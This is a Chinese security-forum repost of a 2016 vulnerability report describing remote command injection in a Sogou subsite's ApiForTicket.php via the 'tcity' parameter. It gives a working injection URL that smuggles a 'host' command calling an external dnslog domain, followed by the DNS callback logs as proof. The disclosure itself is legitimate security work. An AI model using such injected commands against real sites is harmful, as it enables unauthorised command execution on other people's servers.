HanDs
管理员

[7月漏洞公开] 搜狗某分站存在远程命令注入漏洞 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

搜狗某分站存在远程命令注入漏洞

详细说明:

这个的另外一个初同样原理的

WooYun: 搜狗某站点存在隐式命令注入/可执行任意Linux命令(Cloudeye初体验)



# 漏洞网站

http://go.sogou.com

# 漏洞地址

http://go.sogou.com/ApiForTicket.php

# 漏洞参数 tcity

code 区域
http://go.sogou.com/ApiForTicket.php?callback=&tcity=广州;host sogou.99fd5e.dnslog.info;&signet=hotel&limit=2&callback=

漏洞证明:

CloudEye回显

code 区域
24-May-2016 11:53:00.950 queries: client 208.69.37.21#42439 (sogou.99fd5e.dnslog.info): query: sogou.99fd5e.dnslog.info IN A -E (128.199.200.236)
24-May-2016 11:53:02.132 queries: client 208.69.37.21#45666 (sogou.99fd5e.dnslog.info): query: sogou.99fd5e.dnslog.info IN A -E (128.199.200.236)
24-May-2016 11:56:09.310 queries: client 208.69.37.15#36012 (sogou.99fd5e.dnslog.info): query: sogou.99fd5e.dnslog.info IN AAAA -E (128.199.200.236)
24-May-2016 11:56:09.387 queries: client 208.69.37.15#19754 (sogou.99fd5e.dnslog.info): query: sogou.99fd5e.dnslog.info IN A -E (128.199.200.236)
24-May-2016 11:56:28.262 queries: client 208.69.37.11#57770 (sogou.99fd5e.dnslog.info): query: sogou.99fd5e.dnslog.info IN A -E (128.199.200.236)
24-May-2016 11:56:30.638 queries: client 173.194.93.5#56870 (sogou.99fd5e.dnslog.info): query: sogou.99fd5e.dnslog.info IN AAAA -ED (128.199.200.236)
24-May-2016 11:56:31.547 queries: client 208.69.37.17#64901 (sogou.99fd5e.dnslog.info): query: sogou.99fd5e.dnslog.info IN AAAA -E (128.199.200.236)
24-May-2016 11:56:31.615 queries: client 208.69.37.17#31166 (sogou.99fd5e.dnslog.info): query: sogou.99fd5e.dnslog.info IN A -E (128.199.200.236)

修复方案:

# 过滤


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
搜狗 分站 存在 远程 命令 注入 漏洞
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组
快速回复